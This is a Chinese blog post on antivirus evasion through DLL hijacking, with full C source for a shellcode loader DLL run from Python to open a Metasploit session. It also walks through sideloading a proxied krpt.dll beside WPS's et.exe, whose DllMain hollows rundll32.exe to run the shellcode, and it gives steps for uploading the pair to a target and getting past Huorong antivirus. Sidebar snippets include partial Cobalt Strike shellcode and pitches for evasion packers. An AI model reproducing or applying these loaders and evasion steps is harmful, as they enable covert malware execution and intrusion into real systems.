免杀对抗-DLL劫持免杀

最新推荐文章于 2024-05-23 10:40:39 发布
最新推荐文章于 2024-05-23 10:40:39 发布
阅读量1.7k 收藏 6
点赞数 1
分类专栏: 免杀对抗 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51345235/article/details/133544965
版权

C&Py-DLL劫持-语言-调用加载

1.使用visual studio创建项目

2.将文件名重命名为.c后缀

3.将如下加载器代码生成dll文件

加载器代码:

#include "pch.h"
#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

unsigned char buf[] =生成的shellcode;
int main()
{
char* Memory;
Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, buf, sizeof(buf));
((void(*)())Memory)();
}

生成成功

4.msf开启监听

5.使用python执行如下代码,调用dll文件

dll.py

from ctypes import *

#利用python载入dll文件

lib=CDLL('生成的dll文件路径')

#调用dll文件内置方法函数

lib.main()

执行成功,msf成功上线

6.使用打包器将dll.py文件打包成exe,执行成功上线

 

C&C++-DLL劫持-白加黑-导出编译

1.随便选中一个exe程序运行,使用火绒剑查看这个exe程序在运行时加载的dll文件

这里选择的是wps中的et.exe程序,运行发现加载了一个krpt.dll文件

2.使用Dependencies工具对krpt.dll进行反编译

3.右键导出krpt.dll源码

4.使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。

5.选中dll源码拖入项目,工具就会自动加载源码

6.打开asm文件,将所有的jmp语句删除

7.根据文件中的教程,选中文件——右键属性——如下图修改——点击应用。

配置时注意:

配置:选择所有配置

平台:选择所有平台

8.根据教程——继续打开asm文件的属性进行配置

9.项目名称——右键属性——c/c++——代码生成——运行库——多线程(/MT)

10.预编译头——不使用预编译头

11.链接器——调试——生成调试信息——否

12..c文件中添加如下一行代码

13.打开.cpp文件,写入shellcode加载代码(可任意)

如:

#include "framework.h"
#include "krpt.h"
#include "windows.h"

BOOL APIENTRY DllMain(HMODULE hModule,
DWORD  ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{

unsigned char hexData[] = "生成的shellcode";

char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u);
memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}

TerminateProcess(GetCurrentProcess(), 0);
};

case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}

成功生成dll文件

14.将生成的dll文件改名位krpt.dll和et.exe一起上传到目标系统

运行et.exe,成功绕过火绒检测,msf成功上线

xiaoheizi安全
关注
  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
DLL劫持C++源代码创建器
03-21
本工具自动创建用于进行DLL劫持的C++源代码。选择你正在运行的应用程序,选择应用程序加载的DLL,本工具为你创建一个用户劫持此DLL的源代码。代码中有详细的指导,按照指导去配置你的VS,马上编译一个用来劫持的DLL。马上下载下来试试吧。如何创建这个工具,请查看软件的帮助。
工具工具工具工具
05-24
工具工具工具工具工具工具
DLL+Shellcode的Windows注入工具
最新发布
Fly_鹏程万里
05-23 416
S-inject是一款支持x86/x64的DLL和Shellcode 的Windows注入的工具,支持图形化界。
注册 【网络安全】红队攻防之基础
qq_46094651的博客
06-23 84
该系列文章所有的 bypass edr 方法都只在用户态进行操作,已经能规避大多数 AV/EDR 的检测。但不乏一些 edr 进行了比较多的内核层面的限制,如炭黑、fireeye 等。所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包,需要点击下方链接或者保存图片到wx扫描二v码费领取保证100%费👉《黑客&网络安全入门&进阶学习资源包》费分享]安全链接,放心点击。
2009.DLL
net110020的专栏
04-10 243
.DLL. 本人通过多次测试得出的结果 现在得特征码定位.也不好用了  今天就给大家带来一种新的DLL..思路 如何来做.DLL. 废话不多说。。 还是要自己多动..下载文件内附带工具                ┃                     ┃                下载地址  http://5
DLL技术探讨
goddemon
07-19 1440
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任本来不打算写相关的了但是确实是忍不住想吐槽,啧啧啧,因为有一直在研究进程注入以及ring3层的bypass的一些东西因为就得去给相关的文件做的然后给某步提交了一些样本提交完不管是否公开感觉就是转手就给厂商卖钱这里公开一个样本给大家看看时间样本均是登录账户提交的均未公开14的时候是vt全过。...
浅谈dll劫持
记录学习,一起进步
11-25 1347
浅谈dll劫持-白加黑指南
反射注入dll-修改实现过360
bring_coco的博客
07-05 786
getAdvapi32()函数也是LoadLibrary(“advapi32.dll”)的变形,和getKernel32作用一样,只不过是函数所在的dll不同,写成汇编形式避检测,但是使用getAdvapi32()生成会无法注入(具体原因不清除,之后再研究吧),那么我这里注释掉,仅仅用了getKernel32函数。获得的pCFA就是原始的CreateFileA函数了,只不过被我们定义成了自己的,这样就会规避检测了,那么剩下的三处也是同样方法修改,具体参考上面给的代码。
易语言 动态链接库编写dll结合bat运行绕过360误报
weixin_30335353的博客
09-11 766
这个方法非常的有趣,很简单,主要是一个思路。 用易语言编写dll非常的容易,都是中文可视。我这里写两个个例程 例程一 如果需要直接运行命令,直接在“_启动子程序”下调用就行了。 需注意的是,必须至少有一个子程序是公开的。也就是上图“子程序1”勾选公开。 例程二 例程二就是将dll文件写成一个exe程序,将“_启动子程序”勾选公开 然...
wireshark-dll
12-12
解决Wireshark安装后不能打开的问题,可将dll文件拷到wireshark安装目录,注意dll与exe在同一个目录哦
sqlite-dll-win64-x64-3300100.zip
12-14
sqlite库下载,国外太慢了 Precompiled Binaries for Windows ...sqlite-dll-win64-x64-3300100.zip (788.50 KiB) 64-bit DLL (x64) for SQLite version 3.30.1. (sha1: 725eb6588492b5728993815a6e5f0f8f08ddfcb4)
万能加壳工具
04-02
实现多种加壳,支持EXE ,DLL 类文件的加壳,压缩自身体积
最新技术,过世界,过360全套....(共11课)学技术的来
10-26
技术为最新技术,能过大量的毒软件。需要的下载下来学习吧。
DLL劫持代码生成.zip
09-24
DLL劫持代码生成.zip 用于生产劫持dll的xxx.cpp代码
DLL注入工具_拿破轮胎
09-23
拿破轮胎 大佬写的DLL注入工具,资源网上可找,如果所需下载积分超过2,那没必要。。。。。。。。。。。。
易语言-DLL劫持工具易语言
06-25
DLL劫持工具易语言源码
zlib128-dll.zip
05-23
zlib128-dll.zip
dll劫持
qq_46804551的博客
05-04 5904
aheadlib工具劫持 可以看见生成了一个cpp文件,然后我们创建一个dll文件 将生成的cpp文件替换到如下文件 添加#include “pch.h” 填加如下代码 /* cs的payload length: 892 bytes */ unsigned char buf[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b
网络靶场实战-技术之dll注入技术详解
蛇矛实验室
12-19 1179
对于 Windows 操作系统,操作系统的大部分功能都是由 DLL 提供的。此外,当您在这些 Windows 操作系统上运行程序时,该程序的大部分功能可能由 DLL 提供。例如,一些程序可能包含许多不同的模块,程序的每个模块都包含在DLL中并分布在DLL中。DLL 的使用有助于促进代码的模块化、代码重用、有效的内存使用和减少磁盘空间。因此,操作系统和程序加载速度更快,运行速度更快,并且在计算机上占用的磁盘空间更少。当程序使用 DLL 时,称为依赖性的问题可能会导致程序无法运行。
exe加壳工具包 火绒
06-21
### 回答1: 火绒加壳工具包是一款能够让程序避开毒软件检测的软件开发工具。该工具包可以让用户通过一系列的操作,将编写好的程序进行加密和壳化处理。 火绒加壳工具包具备了多种加密和保护功能,其中包括域名加密、资源加密、指令混淆、调试保护等。通过这些功能,用户可以有效的避毒软件对程序的检测和拦截。 火绒加壳工具包的操作简单直观,即使是初学者也可以轻松上手。用户只需要将编写好的程序上传到工具包中,然后根据需要进行选择加密和保护功能的操作,最后点击“加壳”按钮即可完成加壳处理。 在网络安全越来越重要的今天,火绒加壳工具包对于保护程序的安全性有着重要的作用。同时,该工具包的出现也提醒我们,只有真正的了解和掌握技术才能应对不断变化的网络安全环境,才能更好地保护自己的网络安全和信息安全。 ### 回答2: 火绒是一款国内知名的毒软件,同时还提供了exe加壳工具包。这个工具包的作用是对exe程序进行加壳,以此来防止病毒和恶意软件的检测和识别。 火绒的exe加壳工具包具有以下特点: 1. 简单易用:该工具包的操作方法简单明了,任何人都可以快速上手,即使没有编程经验也可以轻松使用。 2. 安全可靠:火绒的工具包使用先进的加密技术,保证了加壳后的程序能够更好地隐藏自己,并且不会被软和病毒检测出来。 3. 兼容性强:火绒的工具包不仅支持32位和64位的Windows系统,还支持多种编程语言,包括C++、C#、Delphi、VB等。 4. 灵活性高:火绒的工具包具有多种加壳选项,使用者可以根据需要选择不同的加壳方式,达到更好的防御效果。 总之,火绒的exe加壳工具包是一款非常实用的工具,它能够帮助开发者和安全专家更好地保护自己的软件和系统受恶意攻击。同时,由于火绒的声誉和安全性备受信任,该工具包的使用也更加放心和可靠。 ### 回答3: 火绒是一种exe加壳工具包。它的作用是将原始的可执行文件进行加密处理,增加可执行文件在被检测时的混淆性和难度,以避软检测出来并绕过软的防御,使恶意程序可以成功运行。 火绒可以通过对加密算法进行优化,对代码进行混淆等方式,使加壳后的代码在被软检测时更加难以被识别。同时,火绒还可以费提供远程服务,帮助使用者避开软检测。 然而,使用火绒进行加壳并不意味着可以逃避所有安全防御。越来越多的软和安全产品正在开发新的技术和方法来解决加壳程序的问题。此外,使用加壳程序也有可能会对合法软件造成误判,影响正常的使用。因此,使用火绒或其他加壳工具包时,应该在进行必要的检测和测试后再使用,以给系统安全和使用造成不必要的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoheizi安全

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值